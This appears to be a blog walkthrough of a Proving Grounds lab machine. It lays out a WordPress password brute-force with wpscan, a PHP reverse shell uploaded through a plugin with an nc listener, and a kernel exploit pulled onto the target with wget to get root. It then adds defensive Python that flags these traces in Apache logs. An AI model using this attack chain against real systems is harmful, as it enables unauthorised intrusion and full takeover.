My first ‘intermediate’ box after most of the beginner ones.
Fun learning process.

1. nmap shows only tcp/80 open.
2. dirb finds a WordPress install.
3. You’ll have to add an entry for loly.lc 192.168.137.121 in /etc/hosts to make the site work (had to read that elsewhere, which was stupid). On the plus side, the login brute force cracks really quickly because the target is virtually local.
4. Brute force the WordPress login with: # wpscan --url http://loly.lc/wordpress -P passes-top-100.txt --max-threads 50 -U loly
– Password: loly+[deleted. u find out]
– Upload the reverse shell by navigating in WordPress to AdRotate > Manage Media. Leave the selector at banners, then browse to and attach our file shell.php.zip. (On Kali, the shell is at /usr/share/webshells/php/php-reverse-shell.php.) Be sure to set your IP and local port (4444 below) at the top of the shell so the target calls back to you.
5. Log in to WordPress and upload php-reverse-shell.php.zip (not sure why it has to be a zip, but it works).
6. Locally, start a listener: # nc -lvp 4444
7. Trigger the shell by browsing to http://192.168.137.121/wordpress/wp-content/banners/shell.php
8. An unprivileged shell pops up in the nc terminal. $ uname -a reveals a vulnerable kernel: Linux ubuntu 4.4.0-31-generic
9. searchsploit finds 45010.c for that kernel version, so download it and compile it with gcc to a binary named sploit.
10. Start apache locally and place sploit at /var/www/html/sploit.
11. From the remote shell you’re in, $ wget 192.168.X.X/sploit into /tmp
12. cd /tmp, chmod +x sploit and run it with ./sploit
13. Boom! uid=0 (root)
14. $ cat /root/proof.txt and submit it to Proving Grounds for credit.
15. I saw no evidence of where the 2nd flag was, so I did a # find . | grep .\txt and found /var/www/local.txt for credit.
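For the defender’s side of the same box, here is an added example (mine, not part of the original write-up) that parses Apache combined-format access-log lines and flags the two traces the steps above leave behind: the wp-login.php password-guessing burst from a single client, and a .php file being served out of a media directory such as wp-content/banners. The log lines, client IPs, the media-directory list and the 20-request threshold are all constructed for the demo.

```python
import re
from collections import Counter

# Parses Apache combined-format access-log lines and flags the two traces the
# walkthrough leaves: a wp-login.php guessing burst and PHP served from a media dir.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Upload/media directories that should never serve server-side code (assumed list).
MEDIA_DIRS = ("/wp-content/uploads/", "/wp-content/banners/")

def parse_line(line):
    """Return the fields of one combined-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def login_bursts(lines, threshold=20):
    """Client IPs that POSTed to wp-login.php at least `threshold` times (password guessing)."""
    counts = Counter()
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            counts[rec["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

def php_in_media_dirs(lines):
    """(ip, path, status) for every .php request under a media directory: a likely web shell."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        path = rec["path"].split("?", 1)[0]          # drop any query string
        if path.lower().endswith(".php") and any(d in path for d in MEDIA_DIRS):
            hits.append((rec["ip"], path, rec["status"]))
    return hits

def sample_log():
    """Constructed log lines (not real captures): 30 wpscan-style login POSTs from one
    client, one benign page view, then a request for a .php file under wp-content/banners."""
    fmt = '{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] "{m} {p} HTTP/1.1" {st} 512 "-" "{ua}"'
    lines = [fmt.format(ip="10.0.0.5", sec=i, m="POST", p="/wordpress/wp-login.php",
                        st=200, ua="WPScan v3.8") for i in range(30)]
    lines.append(fmt.format(ip="10.0.0.9", sec=40, m="GET", p="/wordpress/", st=200, ua="Mozilla/5.0"))
    lines.append(fmt.format(ip="10.0.0.5", sec=45, m="GET",
                            p="/wordpress/wp-content/banners/shell.php", st=200, ua="Mozilla/5.0"))
    return lines

if __name__ == "__main__":
    log = sample_log()
    print("login bursts:", login_bursts(log))
    print("php under media dirs:", php_in_media_dirs(log))
```

Point the same two functions at a real access.log (one line per list element) and the threshold becomes the only knob to tune for your traffic.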

If you can follow and do all these steps, you’re getting good.
From here, you’ll need to get good at knowing what to look for on your own.
Develop a smart-sheet of checks to run against an objective.

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.